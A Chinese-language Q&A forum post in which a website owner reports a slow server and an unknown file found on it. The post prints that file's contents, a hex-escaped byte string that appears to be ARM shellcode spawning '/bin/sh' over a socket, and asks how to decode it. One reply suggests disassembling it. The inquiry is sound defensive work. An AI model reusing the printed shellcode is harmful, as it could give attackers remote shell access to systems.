【发布时间】:2023-01-23 08:58:29
【问题描述】:
今天我对我的网站运行缓慢感到震惊,所以我决定看看哪里出了问题。查看 apache2,服务器带宽,配置不正确,找不到任何东西。所以一时兴起,我打开了一个我不知道存在的随机文件,至少我没有把它放在那里。
这是我在文件中找到的代码:
\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x11\xa1\x8a\x78\x01\x3a\x8a\x70\x02\x21\x08\x1c\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06\x1c\x0b\xa1\x02\x23\x0b\x80\x10\x22\x02\x37\x01\xdf\x3e\x27\x01\x37\xc8\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x07\xa0\x92\x1a\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x01\x21\x08\x1c\x01\xdf\xc0\x46\xff\xff\x7b\xb4\xb9\x35\x5a\x13\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\xff\xc0\x46\xef\xbe\xad\xde
谁能把我推向正确的方向..?它看起来像一些恶意的 shell 代码。我试图对其进行解码,但无法弄清楚它是如何编码的。
谢谢!
我试过 Ascii 转文本、二进制转文本、base64 转文本。当我尝试从 ascii 解码为文本时,我发现的唯一有用的文本是 /bin/。
【问题讨论】:
-
您应该提供更多相关信息(例如体系结构等)。通常,以二进制形式注入的 shellcode(我猜是 ELF 文件,我猜是因为你说的是 apache2...),它将是汇编代码。因此,您必须将该字节字符串反汇编为汇编代码。
标签: binary ascii decode encode shellcode